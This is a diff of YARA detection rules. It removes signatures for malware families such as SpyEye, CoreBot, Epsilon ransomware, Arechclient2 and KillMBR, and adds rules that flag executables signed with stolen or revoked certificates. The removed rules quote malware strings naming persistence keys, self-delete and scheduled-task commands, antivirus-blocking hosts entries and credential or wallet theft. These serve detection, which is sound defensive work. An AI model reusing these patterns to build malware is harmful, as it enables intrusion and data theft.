-		filesize < 400KB and ( $charset_full or ( $charset_begin and $charset_end ) ) and 2 of ( $wsc_object* ) and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "1549 LIMITED" and pe.signatures [ i ] . serial == "1c:7d:3f:6e:11:65:54:80:9f:49:ce:16:cc:b6:2e:84" )
 }
-rule DITEKSHEN_MALWARE_Win_Quilclipper
+
+rule DITEKSHEN_INDICATOR_KB_CERT_75522215406335725687Af888Dcdc80C : FILE
 {
 	meta:
-		description = "Detects QuilClipper variants mostly in memory or extracted AutoIt script"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "bd23ec5a-f21a-5133-a77a-de2615933b82"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "712d41e1-6760-5124-8af2-c57a87816237"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4076-L4094"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L614-L625"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dcac93806a438b188ae70a679301cb6630b9eb6849bf8fbbb1cea5fed5e7cf75"
+		logic_hash = "5166ea726b1be824e5702c411800236d60c44fbfc89a39b1bc103de965249d7d"
 		score = 75
 		quality = 75
-		tags = ""
-
-	strings:
-		$cnc1 = "QUILCLIPPER by" ascii
-		$cnc2 = "/ UserName:" ascii
-		$cnc3 = "/ System:" ascii
-		$s1 = "DLLCALL ( \"kernel32.dll\" , \"handle\" , \"CreateMutexW\" , \"struct*\"" ascii
-		$s2 = "SHELLEXECUTE ( @SCRIPTFULLPATH , \"\" , \"\" , FUNC_" ascii
-		$s3 = "CASE BITROTATE" ascii
-		$s4 = "CASE BITXOR" ascii
-		$s5 = "CLIP( FUNC_" ascii
-		$s6 = "CLIPPUT (" ascii
-		$s7 = "FUNC _CLIPPUTFILE(" ascii
-		$s8 = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Schedule" ascii
+		tags = "FILE"
+		thumbprint = ""
+		importance = 20
 
 	condition:
-		all of ( $cnc* ) or all of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THEESOLUTIONS LTD" and pe.signatures [ i ] . serial == "75:52:22:15:40:63:35:72:56:87:af:88:8d:cd:c8:0c" )
 }
-rule DITEKSHEN_MALWARE_Win_Spyeye : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_768Ddcf9Ed8D16A6Bc77451Ee88Dfd90 : FILE
 {
 	meta:
-		description = "Detects SpyEye"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "aa15220a-6fd4-5c5e-8287-957fc3c3fe52"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "f7d24c5f-e102-568e-bf44-47ccaad6225c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4096-L4111"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L627-L638"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "352853d600d1f4fbc09e58b783eb4e13b335fefbfe89842873710f0a9085d107"
+		logic_hash = "ba98f0da84b678262ee98e5c5fec2aaeab9a0c304fd4552dd27e87aa54f79cdf"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "_CLEANSWEEP_" ascii wide
-		$x2 = "config.datUT" fullword ascii
-		$x3 = "webinjects.txtUT" fullword ascii
-		$s1 = "confirm:processCommand" fullword ascii
-		$s2 = "Smth wrong with navigate to REF-PAGE (err code: %d). 0_o" fullword ascii
-		$s3 = "(UTC%s%2.2f) %s" fullword wide
-		$s4 = "M\\F;u`r" fullword ascii
-		$s5 = "]YH0%Yn" fullword ascii
+		thumbprint = ""
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THEESOLUTIONS LTD" and pe.signatures [ i ] . serial == "76:8d:dc:f9:ed:8d:16:a6:bc:77:45:1e:e8:8d:fd:90" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Renamer : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_59E378994Cf1C0022764896D826E6Bb8 : FILE
 {
 	meta:
-		description = "Detects Renamer/Tainp variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "9e701bbe-d698-510a-b63d-3c1575dac7b0"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "465d0b0c-c9fa-5364-a5f4-0d765ee40081"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4114-L4135"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L640-L651"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "df80657631f072bc1627e1cf503881a2c065396f8798d7f347259672f600198d"
+		logic_hash = "1720636723f0eeab074e29e7c9bf2df3c8d951e27b25ea4b7db60f6c00102589"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "shell\\open\\command=" fullword wide
-		$s2 = "icon=%SystemRoot%\\system32\\SHELL32.dll,4" fullword wide
-		$s3 = "DropTarget" ascii
-		$s4 = "C:\\Windows\\Paint" fullword wide
-		$s5 = "hold.inf" fullword wide
-		$s6 = "Dropped" ascii
+		thumbprint = "9a17d31e9191644945e920bc1e7e08fbd00b62f4"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* ) or ( 4 of ( $s* ) and for any directory in pe.data_directories : ( directory.virtual_address != 0 and directory.size == 0 ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SEVA MEDICAL LTD" and pe.signatures [ i ] . serial == "59:e3:78:99:4c:f1:c0:02:27:64:89:6d:82:6e:6b:b8" )
 }
-rule DITEKSHEN_MALWARE_Win_Epsilon : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3D2580E89526F7852B570654Efd9A8Bf : FILE
 {
 	meta:
-		description = "Detects Epsilon ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "c5561a0d-85ac-5137-a97e-310aa03eb787"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "a80493e6-ed0c-597a-a87e-19c8fa8dd8ce"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4137-L4169"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L668-L679"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cc4481ddb6f5fd52a0bc901dde4c34ccf79024cd68605245df0dcbea22d0adee"
+		logic_hash = "19f418672850536aaac1983b45c3239d5c81c1e4b9b6ee36a761cfc7e2351531"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = ".Speak \"" wide
-		$s2 = "chkUpdateRegistry" fullword wide
-		$s3 = "/C choice /C Y /N /D Y /T 1 & Del \"" fullword wide
-		$s4 = "CreateObject(\"sapi.spvoice\")" fullword wide
-		$s5 = "READ_ME.hta" wide
-		$s6 = "WScript.Sleep(" wide
-		$s7 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
-		$s8 = "<div class='bold'>Files are encrypted* but not deleted.</div>" ascii
-		$e1 = { 72 00 75 00 6e 00 64 00 6c 00 6c 00 2e 00 65 00
-                78 00 65 00 00 09 2e 00 74 00 78 00 74 00 00 09
-                2e 00 64 00 6f 00 63 00 00 0b 2e 00 64 00 6f 00
-                63 00 78 00 00 09 2e 00 78 00 6c 00 73 00 00 0d
-                2e 00 69 00 6e 00 64 00 65 00 78 00 00 09 2e 00
-                70 00 64 00 66 00 00 09 2e 00 7a 00 69 00 70 00
-                00 09 2e 00 72 00 61 00 72 00 00 09 2e 00 63 00
-                73 00 73 00 00 09 2e 00 6c 00 6e 00 6b 00 00 0b
-                2e 00 78 00 6c 00 73 00 78 00 00 09 2e 00 70 00
-                70 00 74 00 00 0b 2e 00 70 00 70 00 74 00 78 00
-                00 09 2e 00 6f 00 64 00 }
-		$e2 = { 68 00 74 00 6d 00 00 07 2e 00 6d 00 6c 00 00 07
-                43 00 3a 00 5c 00 00 07 44 00 3a 00 5c 00 00 07
-                45 00 3a 00 5c 00 00 07 46 00 3a 00 5c 00 00 07
-                47 00 3a 00 5c 00 00 07 5a 00 3a 00 5c 00 00 07
-                41 00 3a 00 5c 00 00 0f 63 00 6d 00 64 00 2e 00
-                65 00 78 00 65 }
+		thumbprint = "c1b4d57a36e0b6853dd38e3034edf7d99a8b73ad"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( all of ( $e* ) and 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MIKL LIMITED" and pe.signatures [ i ] . serial == "3d:25:80:e8:95:26:f7:85:2b:57:06:54:ef:d9:a8:bf" )
 }
-rule DITEKSHEN_MALWARE_Win_Corebot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5Da173Eb1Ac76340Ac058E1Ff4Bf5E1B : FILE
 {
 	meta:
-		description = "Detects CoreBot"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "f0351bdb-34ff-5b6d-bc4b-61fc491401ef"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "1ef8f8b6-e4e9-5504-94bd-b24e81de5694"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4171-L4226"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L681-L692"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "518209458fc8912d47b0b99896178fda823c3174c37f21d5e9331349a69322d7"
+		logic_hash = "c9bfbef4470ee2339ef68484f8a4f21628c0cf9a07770d68d91e6c11e0345786"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-		snort_sid = "920211-920212"
-
-	strings:
-		$f1 = "core.cert_fp" fullword ascii
-		$f2 = "core.crash_handler" fullword ascii
-		$f3 = "core.delay" fullword ascii
-		$f4 = "core.guid" fullword ascii
-		$f5 = "core.inject" fullword ascii
-		$f6 = "core.installed_file" fullword ascii
-		$f7 = "core.plugins_dir" fullword ascii
-		$f8 = "core.plugins_key" fullword ascii
-		$f9 = "core.safe_mode" fullword ascii
-		$f10 = "core.server" fullword ascii
-		$f11 = "core.servers" fullword ascii
-		$f12 = "core.test_env" fullword ascii
-		$f13 = "core.vm_detect" fullword ascii
-		$f14 = "core.vm_detect_skip" fullword ascii
-		$s1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko" fullword wide
-		$s2 = "\\Microsoft\\Windows\\AppCache" wide
-		$s3 = "crash_flag" fullword wide
-		$s4 = "container.dat" fullword wide
-		$s5 = "INJECTED" fullword ascii
-		$s6 = "tmp.delete_file" fullword ascii
-		$x1 = "CoreBot v" wide
-		$x2 = "BotName" fullword ascii
-		$x3 = "RunBotKiller" fullword ascii
-		$x4 = "botv" fullword ascii
-		$x5 = "\\CoreBot\\CoreBot\\obj\\" ascii
-		$v1_1 = "newtask" fullword wide
-		$v1_2 = "drivers\\etc\\hosts" fullword wide
-		$v1_3 = "/C schtasks /create /tn \\" wide
-		$v1_4 = "/st 00:00 /du 9999:59 /sc once /ri 1 /f" wide
-		$v1_5 = "AntivirusInstalled" fullword ascii
-		$v1_6 = "payload" fullword ascii
-		$v1_7 = "DownloadFile" fullword ascii
-		$v1_8 = "RemoveFile" fullword ascii
-		$v1_9 = "AutoRunName" fullword ascii
-		$v1_10 = "EditHosts" fullword ascii
-		$v1_11 = /127\.0\.0\.1 (avast|mcafee|eset|avira|bitdefender|bullguard|safebrowse)\.com/ fullword wide
-		$cnc1 = "&os=" fullword wide
-		$cnc2 = "&pv=" fullword wide
-		$cnc3 = "&ip=" fullword wide
-		$cnc4 = "&cn=" fullword wide
-		$cnc5 = "&lr=" fullword wide
-		$cnc6 = "&ct=" fullword wide
-		$cnc7 = "&bv=" fullword wide
-		$cnc8 = "&op=" fullword wide
-		$cnc9 = "&td=" fullword wide
-		$cnc10 = "&uni=" fullword wide
+		thumbprint = "acb38d45108c4f0c8894040646137c95e9bb39d8"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $f* ) or all of ( $s* ) or ( 3 of ( $s* ) and 2 of ( $f* ) ) or 3 of ( $x* ) or 8 of ( $v1* ) or ( 4 of ( $cnc* ) and 4 of ( $v1* ) ) or 12 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALISA LTD" and pe.signatures [ i ] . serial == "5d:a1:73:eb:1a:c7:63:40:ac:05:8e:1f:f4:bf:5e:1b" )
 }
-rule DITEKSHEN_MALWARE_Win_Dllloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_378D5543048E583A06A0819F25Bd9E85 : FILE
 {
 	meta:
-		description = "Detects unknown DLL Loader"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "164967b8-d0f5-543d-82ac-bb2465b85c2a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "3525888c-9558-5164-b94e-b16511a5ea72"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4228-L4239"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L694-L705"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "aaf1ff0f93d1fe6cf189c9f30403c226e64146178150dff8dfd3a9e3ed84bcc2"
+		logic_hash = "29c6ae99675b8ab2c497faad71791c3fc018e92447bd96f5b2b3f426e1a1322b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "LondLibruryA" fullword ascii
-		$s2 = "LdrLoadDll" fullword ascii
-		$s3 = "snxhk.dll" fullword ascii
-		$s4 = "DisableThreadLibraryCalls" fullword ascii
+		thumbprint = "cf933a629598e5e192da2086e6110ad1974f8ec3"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KITTY'S LTD" and pe.signatures [ i ] . serial == "37:8d:55:43:04:8e:58:3a:06:a0:81:9f:25:bd:9e:85" )
 }
-rule DITEKSHEN_MALWARE_Win_Farfli : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Fdb6F4C09A1Ad69D4Fd2E46Bb1F54313 : FILE
 {
 	meta:
-		description = "Detects Farfli backdoor"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "4c3c86f4-5493-5e8a-9618-b0c3d55e2b86"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e1250c37-fa89-5b8e-bea2-3b5e14039aea"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4241-L4253"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L720-L731"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cb1856b32c66d6d070b8ec2d9feea25d6d6748057ceaa342be2ddc589f9a89d6"
+		logic_hash = "ce78ab52d8aeb87ada9cb86007907a8ad46e91982cc8fff43a61e7ec96609eb2"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "%ProgramFiles%\\Google\\" fullword ascii
-		$s2 = "%s\\%d.bak" fullword ascii
-		$s3 = "%s Win7" fullword ascii
-		$s4 = "%s:%d:%s" fullword ascii
-		$s5 = "C:\\2.txt" fullword ascii
+		thumbprint = "4d1bc69003b1b1c3d0b43f6c17f81d13e0846ea7"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FDSMMCME" and pe.signatures [ i ] . serial == "fd:b6:f4:c0:9a:1a:d6:9d:4f:d2:e4:6b:b1:f5:43:13" )
 }
-rule DITEKSHEN_MALWARE_Win_Warezov : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_E5Bf5B5C0880Db96477C24C18519B9B9 : FILE
 {
 	meta:
-		description = "Detects Warezov worm/downloader"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "8cb1dcb1-981d-5ff2-b0d9-aa18dfbfc795"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "a28dbf8f-1b30-525d-baaf-51342aaf1cb3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4255-L4269"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L733-L744"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e65922902fd18175a3ce7b600d46535e92b92240fa3ca83dced6f9ce14f3e815"
+		logic_hash = "b3e0401a9cf3005abac24114193f34bf439107bf6661b7c2c0b66ca91438c7b9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "ft\\Windows\\CurrentVersion\\Run" wide
-		$s2 = "DIR%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$s3 = "%WINDIR%\\sqhos32.wmf" wide
-		$s4 = "Accept: */*" fullword ascii
-		$s5 = "Range: bytes=" fullword ascii
-		$s6 = "module.exe" fullword ascii
-		$s7 = { 25 73 25 73 2e 25 73 ?? ?? 22 22 26 6c 79 79 56 00 00 00 00 25 73 25 30 34 64 25 30 32 64 25 30 32 64 00 }
+		thumbprint = ""
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WATWGHFC" and pe.signatures [ i ] . serial == "e5:bf:5b:5c:08:80:db:96:47:7c:24:c1:85:19:b9:b9" )
 }
-rule DITEKSHEN_MALWARE_Win_Arechclient2 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ede6Cfbf9Fa18337B0Fdb49C1F693020 : FILE
 {
 	meta:
-		description = "Detects Arechclient2 RAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "c12858ea-5e06-5303-9df0-0f59ba83b5e5"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "f1f34147-132e-53a3-b82c-d98121fc3f2c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4271-L4303"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L746-L757"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0d841f4d4664fb09801c51f7b65e897e4e698753ad67fc20e2b81d98c0b3d07d"
+		logic_hash = "27f06a7a07b818fd34f5d23fd8e78f041063e035c1f8caa99aaaf53ec73a717a"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\Google\\Chrome\\User Data\\copiedProf\"" wide
-		$s2 = "\",\"BotName\":\"" wide
-		$s3 = "\",\"BotOS\":\"" wide
-		$s4 = "\",\"URLData\":\"" wide
-		$s5 = "{\"Type\":\"ConnectionType\",\"ConnectionType\":\"Client\",\"SessionID\":\"" wide
-		$s6 = "{\"Type\":\"TestURLDump\",\"SessionID\":\"" wide
-		$s7 = "<ReceiveParticipantList>" ascii
-		$s8 = "<potocSkr>" ascii
-		$s9 = "fuck_sd" fullword ascii
-		$s10 = "HandleBotKiller" fullword ascii
-		$s11 = "RunBotKiller" fullword ascii
-		$s12 = "ConnectToServer" fullword ascii
-		$s13 = "KillBrowsers" fullword ascii
-		$s14 = "keybd_event" fullword ascii
-		$s15 = "FuckCodeImg" fullword ascii
-		$v1_1 = "grabber@" fullword ascii
-		$v1_2 = "<BrowserProfile>k__" ascii
-		$v1_3 = "<SystemHardwares>k__" ascii
-		$v1_4 = "<geoplugin_request>k__" ascii
-		$v1_5 = "<ScannedWallets>k__" ascii
-		$v1_6 = "<DicrFiles>k__" ascii
-		$v1_7 = "<MessageClientFiles>k__" ascii
-		$v1_8 = /<Scan(Browsers|Wallets|Screen|VPN)>k__BackingField/ fullword ascii
-		$v1_9 = "displayName[AString-ZaString-z\\d]{2String4}\\.[String\\w-]{String6}\\.[\\wString-]{2String7}Local Extension Settingshost" wide
-		$v1_10 = "\\sitemanager.xml MB or SELECT * FROM Cookiesconfig" wide
+		thumbprint = "a99b52e0999990c2eb24d1309de7d4e522937080"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 7 of ( $v1* ) or ( 6 of ( $v1* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "START ARCHITECTURE LTD" and pe.signatures [ i ] . serial == "00:ed:e6:cf:bf:9f:a1:83:37:b0:fd:b4:9c:1f:69:30:20" )
 }
-rule DITEKSHEN_MALWARE_Win_Killmbr : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4F407Eb50803845Cc43937823E1344C0 : FILE
 {
 	meta:
-		description = "Detects KillMBR"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "b109865f-e268-5633-bb8e-f390dd050d99"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d5a6df76-bbbc-5025-b0c4-49e0034c03f3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4305-L4316"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L759-L770"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1ed9206f90052df7e533be4612afa373e5e69fba8f5b5ae4df1c09a9d98958cf"
+		logic_hash = "bb01e912cf40155b0b00e1901bbb3235048ee033d0ddea7a809f0ce8e871e1ce"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\\\.\\PhysicalDrive" ascii
-		$s2 = "/logger.php" ascii
-		$s3 = "Ooops! Your MBR was been rewritten" ascii
-		$s4 = "No, this ransomware dont encrypt your files, erases it" ascii
+		thumbprint = "0c1ffe7df27537a3dccbde6f7a49e38c4971e852"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of them and #s1 > 10 )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLOW COOKED VENTURES LTD" and pe.signatures [ i ] . serial == "4f:40:7e:b5:08:03:84:5c:c4:39:37:82:3e:13:44:c0" )
 }
-rule DITEKSHEN_MALWARE_Win_Lcpdot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2Bffef48E6A321B418041310Fdb9B0D0 : FILE
 {
 	meta:
-		description = "Detects LCPDot"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "e4db3784-7fb0-58bd-997e-788f409445cd"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "fc945c76-b743-52d3-8e15-77afdc629f6d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4318-L4337"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L785-L796"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b0f77f17976c38a69c2ff0d84002f2db29a4d25873309259519115b5f2b210ff"
+		logic_hash = "8d0223b6366f7bc22fd6dd053c1fb6c9e52f80b3bdf9ee46017ddf038bd1e00f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword wide
-		$s2 = "Cookie: SESSID=%s" fullword ascii
-		$s3 = "Cookie=Enable" fullword ascii
-		$s4 = "Cookie=Enable&CookieV=%d&Cookie_Time=32" fullword ascii
-		$s5 = ".?AVTShellCodeRuner@@" fullword ascii
-		$s6 = ".?AVTHashEncDecoder@@" fullword ascii
-		$s7 = ".?AVTWebAddressList@@" fullword ascii
-		$s8 = "WinMain.dll" fullword ascii
-		$s9 = "HotPlugin" wide
-		$o0 = { 4c 89 6c 24 08 4c 89 34 24 44 8d 77 01 44 8d 6f }
-		$o1 = { 8b f0 e8 58 34 00 00 48 8b f8 48 85 c0 74 0c 48 }
-		$o2 = { c7 44 24 30 47 49 46 38 c7 44 24 34 39 61 27 00 }
+		thumbprint = "c40c5157e96369ceb7e26e756f2d1372128cee7b"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of ( $s* ) or ( all of ( $o* ) and 3 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "A&D DOMUS LIMITED" and pe.signatures [ i ] . serial == "2b:ff:ef:48:e6:a3:21:b4:18:04:13:10:fd:b9:b0:d0" )
 }
-rule DITEKSHEN_MALWARE_Win_Torisma : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_73B60719Ee57974447C68187E49969A2 : FILE
 {
 	meta:
-		description = "Detects Torisma"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "e62a0f1c-4404-5da1-9c43-4cb58e735827"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "c72fb0b8-efdc-5734-9754-2289bd95ae3c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4339-L4355"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L798-L809"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
